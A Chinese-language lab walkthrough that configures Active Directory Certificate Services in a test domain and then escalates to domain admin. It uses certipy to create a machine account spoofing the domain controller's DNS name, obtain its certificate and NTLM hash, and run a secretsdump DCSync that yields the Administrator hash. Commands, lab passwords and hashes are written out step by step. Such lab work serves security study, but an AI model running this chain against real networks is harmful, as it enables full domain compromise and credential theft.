环境配置
根据此文章进行配置 ADCS
1
| https://zhuanlan.zhihu.com/p/526293326
|
![image.png](https://img.tucang.cc/api/image/show/2c6c05204ec8020f29dba154fe474581)
安装完后进行配置
![image.png](https://cdn.nlark.com/yuque/0/2024/png/26429680/1704851082579-eb133206-9a3c-4c8b-b2fb-1332546368b7.png#averageHue=%23d6cec6&clientId=ub110e0c5-701f-4&from=paste&id=ud2ea3634&originHeight=922&originWidth=1362&originalType=url&ratio=2&rotation=0&showTitle=false&size=384360&status=done&style=none&taskId=ubf131b65-91d9-435e-bc7e-ae80325a964&title=)
域控服务和域证书服务安装成功后,在服务管理器的仪表盘的工具菜单中选择 “Active Directory管理中心”,然后在 Users 分组下新建一个用户账号,输入密码和选择 “密码永不过期”,模拟加入域环境的普通用户账号。
![image.png](https://img.tucang.cc/api/image/show/b9c00f00a98f70154f50aaabc4d063ed)
创建一个用户:testacc/Cxk@123
![image.png](https://cdn.nlark.com/yuque/0/2024/png/26429680/1704851083026-bf8e53cc-3da0-487c-9a15-0f64eda09f2e.png#averageHue=%23f6f6f6&clientId=ub110e0c5-701f-4&from=paste&id=u2ec855e4&originHeight=788&originWidth=1154&originalType=url&ratio=2&rotation=0&showTitle=false&size=459196&status=done&style=none&taskId=u97a1233e-9b12-4d4f-bded-fd4acd004cd&title=)
登陆一个域内机器
域内定位
1
| certutil -config - -ping certutil -dump -v
|
![image.png](https://img.tucang.cc/api/image/show/932bcbb8d7560915f20c0c94b42bab73)
服务器: DC01.ust4.fun
颁发机构: ust4-DC01-CA
域外定位
1
| certipy find -u [email protected] -p 'Cxk@123' -dc-ip 192.168.214.200 -scheme ldap -stdout
|
![image.png](https://img.tucang.cc/api/image/show/6323d54e864889cef56be92d89d33041)
创建机器用户
1
| certipy account create -u [email protected] -p 'Cxk@123' -dc-ip 192.168.214.200 -user user1 -pass 'Aa@123' -dns 'dc01.ust4.fun'
|
![image.png](https://img.tucang.cc/api/image/show/03ed3c8bb25c6d88f509b07f657b8f57)
利用创建的机器账号申请 machine模板的证书
1
| certipy req -u user1$ -p 'Aa@123' -template Machine -target 192.168.214.200 -ca ust4-DC01-CA -debug
|
![image.png](https://img.tucang.cc/api/image/show/00479bbed8ad1cfbe89e41bd54102988)
获取域控的证书 dc01.pfx
![image.png](https://img.tucang.cc/api/image/show/b0b97ad01588dbfaf528a5b0a0d11cea)
使用证书获取 HASH
1
| certipy auth -pfx dc01.pfx -dc-ip 192.168.214.200 -debug
|
![image.png](https://img.tucang.cc/api/image/show/6630abd4850d5f1b4ea717eedd16f41e)
1
| [*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:c3391d36932d66ad79ffc2bc117c17fa
|
利用 HASH 进行横向
dcsync
1
| python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:c3391d36932d66ad79ffc2bc117c17fa ust4.fun/'dc02$'@192.168.214.201
|
横向到 [email protected]
![image.png](https://img.tucang.cc/api/image/show/4c435976b1e324b372857dc722f750bd)
1
| Administrator:500:aad3b435b51404eeaad3b435b51404ee:214114172ade9bb8d8feca6d765e0cf9:::
|
![image.png](https://img.tucang.cc/api/image/show/a2b2dd1b2aeb563ed5bb128be22a79ef)
![image.png](https://img.tucang.cc/api/image/show/ab5494697ce6bd997c0be35f0e4def3e)